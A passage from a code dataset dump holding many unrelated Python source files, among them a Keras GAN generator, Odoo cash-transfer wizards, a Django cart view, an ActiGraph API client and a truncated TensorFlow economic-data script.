20:\n return(True)\n else:\n return(False)\ncounter = 0\nfor x in range(2**39,2**40):\n if check(x): counter = counter + 1\n if x % 100000 == 0:\n print(float(x)/2**40)\nprint(counter)\n","sub_path":"15.py","file_name":"15.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"623797724","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nimport jieba_fast as jieba\nimport os\nimport sys\ndef textSeg(sourefile0,targetfile0):\n targetfile = targetfile0 + '/sents.txt'\n f_w = open(targetfile, 'w+')\n k = 0\n for p in range(5):\n sourefile = sourefile0+'/part-0000'+str(p)\n f_r = open(sourefile,'r')\n for line in f_r:\n line = line.strip().lower()\n s = line.split('\\t')\n if len(s)!=3:\n continue\n words = \" \".join(jieba.lcut(s[2], HMM=True))\n f_w.write(words+'\\n')\n k+=1\n if k%10000==0:\n print('write %d lines'%k)\n f_r.close()\n #os.remove(sourefile)\n f_w.close()\ndef main(sourefile):\n if not os.path.exists(sourefile+'-seg'):\n os.mkdir(sourefile+'-seg')\n textSeg(sourefile,sourefile+'-seg')\n #os.remove(sourefile)\nif __name__=='__main__':\n sourcefile = sys.argv[1]\n main(sourcefile)","sub_path":"myscript/textseg.py","file_name":"textseg.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"483027639","text":"# example of defining the generator model\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import Reshape\nfrom keras.layers import Conv2D\nfrom keras.layers import Conv2DTranspose\nfrom keras.layers import LeakyReLU\n\n\n# define the standalone generator model\nfrom numpy.matlib import randn, zeros\n\n\ndef define_generator(latent_dim):\n model = Sequential()\n # foundation for 7x7 image\n n_nodes = 128 * 7 * 7\n model.add(Dense(n_nodes, input_dim=latent_dim))\n model.add(LeakyReLU(alpha=0.2))\n model.add(Reshape((7, 7, 128)))\n # upsample to 14x14\n model.add(Conv2DTranspose(128, (4,4), strides=(2,2), padding='same'))\n model.add(LeakyReLU(alpha=0.2))\n # upsample to 28x28\n model.add(Conv2DTranspose(128, (4,4), strides=(2,2), padding='same'))\n model.add(LeakyReLU(alpha=0.2))\n model.add(Conv2D(1, (7,7), activation='sigmoid', padding='same'))\n return model\n\n\n# generate points in latent space as input for the generator\ndef generate_latent_points(latent_dim, n_samples):\n # generate points in the latent space\n x_input = randn(latent_dim * n_samples)\n # reshape into a batch of inputs for the network\n x_input = x_input.reshape(n_samples, latent_dim)\n return x_input\n\n\n# use the generator to generate n fake examples, with class labels\ndef generate_fake_samples(g_model, latent_dim, n_samples):\n # generate points in latent space\n x_input = generate_latent_points(latent_dim, n_samples)\n # predict outputs\n X = g_model.predict(x_input)\n # create 'fake' class labels (0)\n y = zeros((n_samples, 1))\n return X, y\n","sub_path":"generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"164255651","text":"import numpy as np\nfrom pyquaternion import Quaternion\nimport matplotlib.pyplot as plt\n\nclass Satelite():\n '''\n GPS satellites fly in medium Earth orbit (MEO) at an altitude of approximately 20,200 km\n Operating frequency 1575.42MHz\n '''\n def __init__(self, x, y):\n self.location = np.array((x,y,20200*1000))\n self.frequency = 1575.42e6\n self.wavelength = 3e8/self.frequency\n # self.phase_noise = phase_noise\n\n def phase_calculate(self, rx_location, phase_noise=0.01):\n distance = np.linalg.norm(self.location-rx_location)\n phase = (distance % self.wavelength)*2*np.pi\n phase += np.random.randn(*phase.shape) * phase_noise\n return phase\n\n def line_of_sight(self, drone_location):\n self.los = self.location-drone_location\n self.los /= np.sum(self.los)\n\nclass Drone():\n '''\n Quadcopter with 4 GPS receivers\n '''\n def __init__(self, location, quaternion, noise_pwr = 0.01):\n self.location = location\n self.quaternion = Quaternion(quaternion)\n self.rx = np.zeros((4,3))\n self.noise_pwr = noise_pwr\n\n def rotate(self, arm_length):\n self.rx = np.array(([arm_length,0,0],[-arm_length,0,0],[0,arm_length,0],\n [0,-arm_length,0]))\n for i in range(4):\n self.rx[i] = self.quaternion.rotate(self.rx[i])\n self.rx[i] += self.location\n # self.rx[i] += np.random.randn(3)*self.noise_pwr\n\n def phase_calculate(self, satelite):\n phase = np.zeros(4)\n for i in range(4):\n phase[i] = satelite.phase_calculate(self.rx[i])\n return phase\n\nclass Model():\n '''\n System model:\n measurement: doubleDiffRxSate\n state transition: doubleDiffRxTime\n '''\n def __init__(self, N, rx_num):\n self.N = N\n self.rx_num = rx_num\n self.singleDiffRx = np.zeros((N,rx_num,2))\n self.doubleDiffRxSate = np.zeros((N,rx_num))\n self.singleDiffTime = np.zeros((N,rx_num,2))\n self.doubleDiffRxTime = np.zeros((N,rx_num))\n\n def diff_calculate(self, phase):\n for j in range(self.rx_num):\n self.singleDiffRx[0][j] = phase[0][j]-phase[0][0]\n self.doubleDiffRxSate[0] = self.singleDiffRx[0,:,0]-self.singleDiffRx[0,:,1]\n for i in range(1,self.N):\n for j in range(self.rx_num):\n self.singleDiffRx[i][j] = phase[i][j]-phase[i][0]\n self.doubleDiffRxSate[i] = self.singleDiffRx[i,:,0]-self.singleDiffRx[i,:,1]\n self.singleDiffTime[i] = phase[i]-phase[i-1]\n self.doubleDiffRxTime[i] = self.doubleDiffRxSate[i]-self.doubleDiffRxSate[i-1]\n\nclass Filter():\n def __init__(self, N):\n self.estimation = np.zeros((N,4))\n","sub_path":"track_orientation.py","file_name":"track_orientation.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"446611666","text":"\"\"\"\n7.\tНапишите программу, доказывающую или проверяющую, что для множества\nнатуральных чисел выполняется равенство: 1+2+...+n = n(n+1)/2,\n где n - любое натуральное число.\n\"\"\"\n\nprint(\"Проверяющую равенство: 1+2+...+n = n(n+1)/2,где n - любое натуральное число.\")\nuserInput = int(input(\"Введите число: \"))\n\nleft_side = 0\n\nfor i in range(1, userInput + 1):\n left_side += i\n\nright_side = userInput * (userInput + 1) // 2\n\nif left_side == right_side:\n print(\"Равенство доказано\")\nelse:\n print(\"Равенство не доказано\")","sub_path":"Lesson_2/7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"351563179","text":"# a,b = map(eval,input().split())\n# a1=round(a,0)\n# b1=round(b,2)\n# print((a1*b1)//100)\na, b = input().split()\nA = int(a)\nB = float(b)\nB100 = round(100*B)\nprint(B100)\nC=A*B100\nprint(str(C//100))","sub_path":"m3.py","file_name":"m3.py","file_ext":"py","file_size_in_byte":194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"133326562","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api\nfrom odoo.exceptions import ValidationError\n\n\nclass PaiementChequeClientWizard(models.TransientModel):\n _name = \"paiement.cheque.client.wizard\"\n\n cheque_id = fields.Many2one('paiement.cheque.client', string=u'Chèque', readonly=True)\n amount = fields.Float(string=u'Montant', readonly=True)\n due_date = fields.Date(string=u'Echéance', readonly=True)\n ok = fields.Boolean(u'Transférer?')\n caisse_id = fields.Many2one('caisse.to.central', 'Caisse', readonly=True)\n\n\nclass PaiementEffetClientWizard(models.TransientModel):\n _name = \"paiement.effet.client.wizard\"\n\n effet_id = fields.Many2one('paiement.effet.client', string=u'Effet', readonly=True)\n amount = fields.Float(string=u'Montant', readonly=True)\n due_date = fields.Date(string=u'Echéance', readonly=True)\n ok = fields.Boolean(u'Transférer?')\n caisse_id = fields.Many2one('caisse.to.central', 'Caisse', readonly=True)\n\n\nclass PaiementOvClientWizard(models.TransientModel):\n _name = \"paiement.ov.client.wizard\"\n\n ov_id = fields.Many2one('paiement.ov.client', string=u'OV', readonly=True)\n amount = fields.Float(string=u'Montant', readonly=True)\n due_date = fields.Date(string=u'Echéance', readonly=True)\n ok = fields.Boolean(u'Transférer?')\n caisse_id = fields.Many2one('caisse.to.central', 'Caisse', readonly=True)\n\n\nclass PaiementCbClientWizard(models.TransientModel):\n _name = \"paiement.cb.client.wizard\"\n\n cb_id = fields.Many2one('paiement.cb.client', string=u'CB', readonly=True)\n amount = fields.Float(string=u'Montant', readonly=True)\n due_date = fields.Date(string=u'Echéance', readonly=True)\n ok = fields.Boolean(u'Transférer?')\n caisse_id = fields.Many2one('caisse.to.central', 'Caisse', readonly=True)\n\n\nclass PaiementCashClientWizard(models.TransientModel):\n _name = \"paiement.cash.client.wizard\"\n\n cash_id = fields.Many2one('paiement.cash.client', string=u'Espèce', readonly=True)\n amount = fields.Float(string=u'Montant', readonly=True)\n due_date = fields.Date(string=u'Echéance', readonly=True)\n ok = fields.Boolean(u'Transférer?')\n caisse_id = fields.Many2one('caisse.to.central', 'Caisse', readonly=True)\n\n\nclass CaisseToCentral(models.TransientModel):\n _name = \"caisse.to.central\"\n \n cheque_lines = fields.One2many('paiement.cheque.client.wizard', 'caisse_id', string=u'Chèques')\n effet_lines = fields.One2many('paiement.effet.client.wizard', 'caisse_id', string=u'Effets')\n ov_lines = fields.One2many('paiement.ov.client.wizard', 'caisse_id', string=u'OV')\n cb_lines = fields.One2many('paiement.cb.client.wizard', 'caisse_id', string=u'OV')\n cash_lines = fields.One2many('paiement.cash.client.wizard', 'caisse_id', string=u'Espèces')\n total_cheque = fields.Float(string=u'Total chèques', readonly=True)\n total_effet = fields.Float(string=u'Total effets', readonly=True)\n\n @api.model\n def _partial_cheque(self, cheque):\n partial_cheque = {\n 'cheque_id': cheque.id,\n 'amount': cheque.amount,\n 'due_date': cheque.due_date,\n }\n return partial_cheque\n\n @api.model\n def _partial_effet(self, effet):\n partial_effet = {\n 'effet_id': effet.id,\n 'amount': effet.amount,\n 'due_date': effet.due_date,\n }\n return partial_effet\n\n @api.model\n def _partial_ov(self, ov):\n partial_ov = {\n 'ov_id': ov.id,\n 'amount': ov.amount,\n }\n return partial_ov\n\n @api.model\n def _partial_cb(self, cb):\n partial_cb = {\n 'cb_id': cb.id,\n 'amount': cb.amount,\n }\n return partial_cb\n\n @api.model\n def _partial_cash(self, cash):\n partial_cash = {\n 'cash_id': cash.id,\n 'amount': cash.amount,\n }\n return partial_cash\n\n @api.model\n def default_get(self, fields):\n res = super(CaisseToCentral, self).default_get(fields)\n caisse_id = self.env.context['active_id']\n caisse = self.env['paiement.caisse'].browse(caisse_id)\n if caisse.caisse_centrale == True:\n raise ValidationError(u\"Vous devez seulement transférer à partir d'une caisse normale\")\n if 'cheque_lines' in fields:\n line = [(0, 0, self._partial_cheque(m)) for m in caisse.cheque_lines]\n res.update(cheque_lines=line)\n if 'effet_lines' in fields:\n line = [(0, 0, self._partial_effet(m)) for m in caisse.effet_lines]\n res.update(effet_lines=line)\n if 'ov_lines' in fields:\n line = [(0, 0, self._partial_ov(m)) for m in caisse.ov_lines]\n res.update(ov_lines = line)\n if 'cb_lines' in fields:\n line = [(0, 0, self._partial_cb(m)) for m in caisse.cb_lines]\n res.update(cb_lines = line)\n if 'cash_lines' in fields:\n line = [(0, 0, self._partial_cash(m)) for m in caisse.cash_lines]\n res.update(cash_lines = line)\n if 'total_cheque' in fields:\n total=0.0\n for ch in caisse.cheque_lines:\n total += ch.amount\n res.update(total_cheque=total)\n if 'total_effet' in fields:\n total=0.0\n for eff in caisse.effet_lines:\n total += eff.amount\n res.update(total_effet=total)\n return res\n\n def to_central_action(self):\n for wizard in self:\n for cheque in wizard.cheque_lines:\n if cheque.cheque_id.state == 'caisse' and cheque.ok:\n cheque.cheque_id.action_caisse_centrale()\n for effet in wizard.effet_lines:\n if effet.effet_id.state == 'caisse' and effet.ok:\n effet.effet_id.action_caisse_centrale()\n for ov in wizard.ov_lines:\n if ov.ov_id.state == 'caisse' and ov.ok:\n ov.ov_id.action_caisse_centrale()\n for cb in wizard.cb_lines:\n if cb.cb_id.state == 'caisse' and cb.ok:\n cb.cb_id.action_caisse_centrale()\n for cash in wizard.cash_lines:\n if cash.cash_id.state == 'caisse' and cash.ok:\n cash.cash_id.action_caisse_centrale()\n return {'type': 'ir.actions.act_window_close'}\n","sub_path":"account_tres_customer/wizard/caisse_to_central.py","file_name":"caisse_to_central.py","file_ext":"py","file_size_in_byte":6363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"575562149","text":"'''\nload imagenet test dataset as numpy array\nlen(test_x)==50000\n\nusage:\n\n import imagenet\n\n test_x, test_y = imagenet.load_imagenet_test()\n\n\n'''\nfrom PIL import Image\nfrom scipy.ndimage import filters\nimport os\nimport tensorflow as tf\nimport numpy as np\n\n# TRAIN_DIR_PATH = '/home/cwx17/data/imagenet/train'\n# TRAIN_X_PATH = '/home/cwx17/data/imagenet/train/img'\n# TRAIN_X_ARR_PATH = '/home/cwx17/data/imagenet/train/imgarr.npy'\n\nTEST_DIR_PATH = '/home/cwx17/data/imagenet/test/valid_32x32'\nTEST_X_PATH = '/home/cwx17/data/imagenet/test/valid_32x32'\nTRAIN_X_ARR_PATH = '/home/cwx17/data/imagenet/test.npy'\nTEST_X_ARR_PATH = '/home/cwx17/data/imagenet/test.npy'\n\n\ndef _fetch_array_x(path):\n file_names = os.listdir(path)\n file_names.sort()\n imgs = []\n # scale = 148 / float(64)\n # sigma = np.sqrt(scale) / 2.0\n for name in file_names:\n im = Image.open(os.path.join(path, name))\n img = np.asarray(im)\n # print(img.shape)\n if img.shape[0] != 32:\n print('err')\n # im = im.crop((15,40,163,188))\n # # img.setflags(write=True)\n # # for dim in range(img.shape[2]):\n # # img[...,dim] = filters.gaussian_filter(img[...,dim], sigma=(sigma,sigma))\n imgs.append(img)\n print(len(imgs))\n\n return np.array(imgs)\n\n\ndef _fetch_array_y(path):\n evalue = []\n with open(path, 'rb') as f:\n for line in f.readlines():\n q = line.decode('utf-8')\n q = q.strip()\n q = int(q.split(' ')[1])\n evalue.append(q)\n return np.array(evalue)\n\n\ndef load_imagenet(x_shape=(32, 32, 3), x_dtype=np.float32, y_dtype=np.int32,\n normalize_x=False):\n \"\"\"\n Load the imagenet dataset as NumPy arrays.\n samilar to load_not_mnist\n\n Args:\n Unimplemented!(haven't found a good way to resize) x_shape: Reshape each digit into this shape. Default ``(218, 178)``.\n x_dtype: Cast each digit into this data type. Default `np.float32`.\n y_dtype: Cast each label into this data type. Default `np.int32`.\n normalize_x (bool): Whether or not to normalize x into ``[0, 1]``,\n by dividing each pixel value with 255.? (default :obj:`False`)\n\n Returns:\n (np.ndarray, np.ndarray), (np.ndarray, np.ndarray): The\n (train_x, train_y), (test_x, test_y)\n \n \"\"\"\n\n train_x = np.load(TRAIN_X_ARR_PATH, mmap_mode='r')\n train_y = None\n test_x = np.load(TEST_X_ARR_PATH, mmap_mode='r')\n test_y = None\n\n return (train_x, train_y), (test_x, test_y)\n\n\nif __name__ == '__main__':\n print('pre load')\n (x_test, y_test) = load_imagenet()\n print(x_test.shape)\n\n np.save(TEST_X_PATH, x_test)\n","sub_path":"ood_regularizer/experiment/datasets/imagenet.py","file_name":"imagenet.py","file_ext":"py","file_size_in_byte":2718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"496310144","text":"from random import randint\nfrom math import sqrt\nfrom PIL import Image\n\nimport base64\nfrom io import BytesIO\n\ndef t2i(text, key=1234):\n if key > 8894:\n key = 8895 - key // 8895\n if key < 1000:\n key += 1000\n\n size = sqrt(len(text))\n if size != int(size):\n size = size + 1\n size = int(size)\n\n image = Image.new('RGB', (size, size), (255, 255, 255))\n\n pos = [0, 0]\n for letter in text:\n number = ord(letter) + key\n\n red = randint(0, number // 100)\n blue = number // 100 - red\n green = number % 100 + 100\n red += 100\n blue += 100\n\n rgb = (red, green, blue)\n\n image.putpixel(pos, rgb)\n\n pos[0] += 1\n if pos[0] >= size:\n pos[0] = 0\n pos[1] += 1\n if pos[0] == 0:\n pos[1] -= 1\n if pos[1] + 1 < size:\n image.crop((0, 0, size, size - 1))\n return image\n\n\ndef i2t(image, key=1234):\n if key > 8895:\n key = 8895 - key // 8895\n if key < 1000:\n key += 1000\n text = ''\n for y in range(0, image.size[0]):\n for x in range(0, image.size[1]):\n\n rgb = image.getpixel((x, y))\n\n if rgb == (255, 255, 255):\n return text\n\n number = (((rgb[0] - 100) + (rgb[2] - 100)) * 100 + (rgb[1] - 100)) - key\n text += chr(number)\n return text\n","sub_path":"ImageCoder.py","file_name":"ImageCoder.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"236992953","text":"from django.shortcuts import render\nfrom .models import Cart, CartItem\nfrom django.http import JsonResponse\nimport json\nimport ast\nfrom django.http import HttpResponse\nfrom products.models import Products\n\n# Create your views here.\n\n\ndef cart(request, ip):\n crt = Cart.objects.get(userip=ip)\n prods = CartItem.objects.filter(cart=crt)\n\n return render(request, \"cart.html\", {\"products\": prods})\n\n\ndef update_quant(request):\n\n prod_id = request.GET.get(\"prod_id\")\n action = request.GET.get(\"action\")\n change = request.GET.get(\"change\")\n cartitem = request.GET.get(\"cartitem\")\n prod = Products.objects.get(id=prod_id)\n if action == \"add\":\n prod.quantity = prod.quantity - 1\n request.sessions[\"items\"] = request.session[\"items\"] - 1\n else:\n prod.quantity = prod.quantity + 1\n request.sessions[\"items\"] = request.session[\"items\"] + 1\n prod.save()\n item = CartItem.objects.get(id=cartitem)\n item.quantity = change\n if item.quantity == 0:\n item.save()\n else:\n item.delete()\n return HttpResponse(prod_id) # (context)\n","sub_path":"cart/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"20487883","text":"from django.shortcuts import render\r\n\r\n\r\ndef index(request):\r\n return render(request, 'index.html')\r\n\r\n\r\ndef count(request):\r\n count_num = len(request.GET['hello'])\r\n text = request.GET['hello']\r\n dic = {'hell': count_num,'text':text}\r\n dict = {}\r\n for word in text:\r\n if word not in dict:\r\n dict[word] = 1\r\n else:\r\n dict[word] += 1\r\n max_char = text[0]\r\n for key in dict:\r\n if dict[key]>dict[max_char]:\r\n max_char = key\r\n dic['max_char'] = max_char\r\n dic['max_num'] = dict[max_char]\r\n return render(request, 'count.html', dic)\r\n\r\n","sub_path":"wordcount/function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"604603592","text":"\"\"\"Entry point for RPC processes.\"\"\"\n\nimport importlib\nimport os\nimport sys\n\nfrom myia.utils.serialize import MyiaDumper, MyiaLoader\n\nfrom . import _dead_handle\n\n\ndef _rpc_server():\n # Try to prevent other libs from using stdout\n sys.stdout = sys.stderr\n do_pm = os.environ.get(\"MYIA_PYTEST_USE_PDB\", False)\n dumper = MyiaDumper(1)\n dumper.open()\n loader = MyiaLoader(0)\n pkg, name, init_args = loader.get_data()\n try:\n mod = importlib.import_module(pkg)\n cls = getattr(mod, name)\n iface = cls(**init_args)\n dumper.represent(\"ready\")\n except Exception as e:\n if do_pm: # pragma: no cover\n import rpdb\n\n rpdb.post_mortem()\n dumper.represent(e)\n return 1\n\n while loader.check_data():\n data = loader.get_data()\n if isinstance(data, tuple):\n name, args, kwargs = data\n try:\n meth = getattr(iface, name)\n res = meth(*args, **kwargs)\n except Exception as e: # pragma: no cover\n if do_pm: # pragma: no cover\n import rpdb\n\n rpdb.post_mortem()\n res = e\n dumper.represent(res)\n elif isinstance(data, list):\n msg, arg = data\n if msg == \"dead_handle\":\n _dead_handle(arg)\n elif msg == \"handle_call\":\n try:\n res = arg[0](*arg[1], **arg[2])\n except Exception as e: # pragma: no cover\n if do_pm: # pragma: no cover\n import rpdb\n\n rpdb.post_mortem()\n res = e\n dumper.represent(res)\n else:\n raise ValueError(f\"Unknown message: {msg}\") # pragma: no cover\n else: # pragma: no cover\n raise TypeError(f\"bad data {data}\")\n return 0\n\n\nsys.exit(_rpc_server())\n","sub_path":"myia/compile/channel/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"392173764","text":"import cv2\nimport argparse\n\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\", \"--images\", required=True,\n help=\"path to input directory of images\")\nap.add_argument(\"-t\", \"--threshold\", type=float, default=100.0,\n help=\"focus measures that fall below this value will be considered 'blurry'\")\nargs = vars(ap.parse_args())\n\ndef check_blur(image):\n return cv2.Laplacian(image, cv2.CV_64F).var()\n\n\nimg = cv2.imread(args['images'])\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\nblur = check_blur(gray)\nprint(blur)\n","sub_path":"check_blur.py","file_name":"check_blur.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"396869208","text":"# -*- coding: utf-8 -*-\nfrom zope.interface import implements\n\nfrom Products.CMFCore.utils import getToolByName\nfrom Acquisition import aq_inner\nfrom genweb.core.interfaces import IHomePage\nfrom genweb.core.utils import pref_lang\n\n\nfrom plone.portlets.interfaces import IPortletDataProvider\nfrom plone.app.portlets.portlets import base\n\nfrom Products.Five.browser.pagetemplatefile import ViewPageTemplateFile\n\nfrom ulearn.core import _\nfrom zope.component.hooks import getSite\n\n\nclass ICustomButtonBarPortlet(IPortletDataProvider):\n \"\"\" A portlet which can render the logged user profile information.\n \"\"\"\n\n\nclass Assignment(base.Assignment):\n implements(ICustomButtonBarPortlet)\n\n title = _(u'custombuttonbar')\n\n\nclass Renderer(base.Renderer):\n\n render = ViewPageTemplateFile('custombuttonbar.pt')\n\n def getHomepage(self):\n page = {}\n context = aq_inner(self.context)\n pc = getToolByName(context, 'portal_catalog')\n result = pc.searchResults(object_provides=IHomePage.__identifier__,\n Language=pref_lang())\n page['body'] = result[0].CookedBody()\n\n return page\n\n def portal_url(self):\n return self.portal().absolute_url()\n\n def portal(self):\n return getSite()\n\n def pref_lang(self):\n \"\"\" Extracts the current language for the current user\n \"\"\"\n lt = getToolByName(self.portal(), 'portal_languages')\n return lt.getPreferredLanguage()\n\n\nclass AddForm(base.NullAddForm):\n\n def create(self):\n return Assignment()\n","sub_path":"ulearn/theme/portlets/custombuttonbar/custombuttonbar.py","file_name":"custombuttonbar.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"419576635","text":"# -*- coding: utf-8 -*-\n# @Time: 2020/10/16 11:01\n# @Author: Rollbear\n# @Filename: test_tiles_on_dblp.py\n\nimport unittest\nimport tiles as t\n\n\nclass TestOnDBLP(unittest.TestCase):\n def test_dblp_phdthesis(self):\n data_path = \"../../data/dblp_timestamp/phdthesis/2017.edgelist\"\n output_path = \"../../data/dblp_timestamp/phdthesis/\"\n\n tl = t.TILES(data_path,\n path=output_path)\n tl.execute() # 执行算法\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"my_script/test/test_tiles_on_dblp.py","file_name":"test_tiles_on_dblp.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"176796298","text":"#import requests\n#from requests.auth import HTTPBasicAuth\n# Added to remove InsecureRequestWarning\nimport requests\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\n# Removed this one\n#from requests_oauthlib import OAuth1\nimport hmac\nimport hashlib\nimport base64\nimport datetime\nimport time\nimport array\nimport json\n\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\ndef BuildRequestHeader( httpMethod, Uri, apiAccessKey, apiSecretKey ):\n \"Builds the Request Header Dictionary\"\n \n # dictionaty for request header parameters\n headerDictionary = {}\n \n # set content-type for POST and PUT operations\n if httpMethod == 'POST' or httpMethod == 'PUT':\n headerDictionary['content-type'] = 'application/json'\n\n # retrieve current timestamp in UTC \n currentUtcTime = datetime.datetime.utcnow()\n\n # perform signing\n stringToSign = str(httpMethod + \"\\n\\n\\n\" + currentUtcTime.strftime('%Y-%m-%dT%H:%M:%SZ') + \"\\n\" + Uri).encode('utf-8')\n digest = hmac.new(apiSecretKey, stringToSign, hashlib.sha256).digest()\n signature = base64.b64encode(digest).decode('utf-8')\n\n # Add authorization property to header dictionary\n headerDictionary['Authorization'] = \"AGS\" + \" \" + apiAccessKey + \":\" + signature\n\n # Add date property to header dictionart\n headerDictionary['Date'] = currentUtcTime.strftime('%a, %d %b %Y %H:%M:%S +0000')\n\n return headerDictionary;\n\ndef SendRequest ( httpMethod, Uri, apiAccessKey, apiSecretKey ):\n \"Sends request to study admin api and returns response\"\n headerDictionary = BuildRequestHeader(httpMethod, Uri, apiAccessKey, apiSecretKey )\n response = requests.get(Uri, headers=headerDictionary, verify=False)\n return response;\n\nbaseUri = 'https://studyadmin-api.actigraphcorp.com'\napi_access_key = '<api access key goes here>'\napi_secret = str('<api secret key goes here>').encode('utf-8')\n\n# Get Studies Endppoint (returns list of studies)\nresourceUri = '/v1/studies'\nresponse = SendRequest('GET', baseUri + resourceUri, api_access_key, api_secret) \nprint ('response: ' )\nprint ( response.status_code )\nprint ( response.json() )\n\n\n## Get Study Endpoint (retuns information on specific study)\n#studyId = '<Study Id Goes Here>'\n#resourceUri = '/v1/studies/' + studyId \n#response = SendRequest('GET', baseUri + resourceUri, api_access_key, api_secret)\n#print ( response.json() )\n\n## Get Study Subjects Endpoint (returns subjects within specific study)\n#studyId = '<Study Id Goes Here>'\n#resourceUri = '/v1/studies/' + studyId + '/subjects'\n#response = SendRequest('GET', baseUri + resourceUri, api_access_key, api_secret)\n#print ( response.json() )\n\n## Get Sites Endpoint (returns list of sites) \n#resourceUri = '/v1/sites'\n#response = SendRequest('GET', baseUri + resourceUri, api_access_key, api_secret)\n#print ( response.json() )\n\n## Get Subject Endpoint (returns information on specific subject)\n#subjectId = '<Subject Id goes here>'\n#resourceUri = '/v1/subjects/' + subjectId\n#response = SendRequest('GET', baseUri + resourceUri, api_access_key, api_secret)\n#print ( response.json() )\n","sub_path":"Examples/PythonExampleConnectingToAPI.py","file_name":"PythonExampleConnectingToAPI.py","file_ext":"py","file_size_in_byte":3108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"506478400","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Sep 15 20:14:23 2018\r\n\r\n@author: Joyce\r\n\"\"\"\r\n#add needed\r\nfrom __future__ import print_function\r\n\r\nimport math\r\n\r\nfrom IPython import display\r\nfrom matplotlib import cm\r\nfrom matplotlib import gridspec\r\nfrom matplotlib import pyplot as plt\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom sklearn import metrics\r\nimport tensorflow as tf\r\nfrom tensorflow.python.data import Dataset\r\n\r\ntf.logging.set_verbosity(tf.logging.ERROR)\r\npd.options.display.max_rows = 10\r\npd.options.display.float_format = '{:.1f}'.format\r\n\r\n#read econoemeic date\r\necnm_dataframe = pd.read_csv(\"D:\\TF TEST LEARNING\\ls\\ecnm_ml\\ml_data_all.csv\", sep=\",\")\r\n\r\n#ecnm_dataframe = ecnm_dataframe.reindex(np.random.permutation(ecnm_dataframe.index))\r\n\r\ndef preprocess_features(california_housing_dataframe):\r\n \"\"\"Prepares input features from economic data set.\r\n\r\n Args:\r\n ecnm_dataframe: A Pandas DataFrame expected to contain data\r\n from the economic data set.\r\n Returns:\r\n A DataFrame that contains the features to be used for the model, including\r\n synthetic features.\r\n \"\"\"\r\n #\r\n selected_features = ecnm_dataframe[\r\n [\"y\",\"m\",\"d\",\"tw_Open\",\"tw_High\",\"tw_Low\",\"jp_Adj_Close\",\"chnsse_Adj_Close\",\"chnhs_Adj_Close\",\"ko_Adj_Close\",\"iny_Adj_Close\",\"ind_Adj_Close\",\"astsp_Adj_Close\",\"ast_Adj_Close\",\"usdow_Adj_Close\",\"usnsdq_Adj_Close\",\"usvix_Adj_Close\",\"ussp_Adj_Close\",\"eurestx_Adj_Close\",\"blx_Adj_Close\",\"fnc_Adj_Close\",\"grm_Adj_Close\",\"cnd_Adj_Close\",\"mxc_Adj_Close\",\"agt_Adj_Close\",\"chl_Adj_Close\",\"bx_Adj_Close\",\"Isrl_Adj_Close\",\"tw_VALUE\",\"jp_VALUE\",\"chn_VALUE\",\"chnhk_VALUE\",\"bx_VALUE\",\"cnd_VALUE\",\"ind_VALUE\",\"ko_VALUE\",\"mlx_VALUE\",\"mxc_VALUE\",\"sd_VALUE\",\"nafrc_VALUE\",\"sgp_VALUE\",\"sz_VALUE\",\"aut_VALUE\",\"eur_VALUE\",\"nzn_VALUE\",\"uk_VALUE\",\"RDSCUNT_RATE\",\"RATE_YEAR\",\"RATE\",\"BOND_RATE\",\"PRP_M\",\"PRP_M_P\",\"M1A\",\"M1B\",\"M2\",\"PUR_A\",\"ASSETS\",\"LIABILITIES\"]]\r\n processed_features = selected_features.copy()\r\n # Create a synthetic feature.\r\n processed_features[\"tw_delta\"] = ((ecnm_dataframe[\"tw_High\"]/1000.0) -(ecnm_dataframe[\"tw_Low\"]/1000.0))\r\n return processed_features\r\n\r\ndef preprocess_targets(california_housing_dataframe):\r\n \"\"\"Prepares target features (i.e., labels) from California housing data set.\r\n\r\n Args:\r\n california_housing_dataframe: A Pandas DataFrame expected to contain 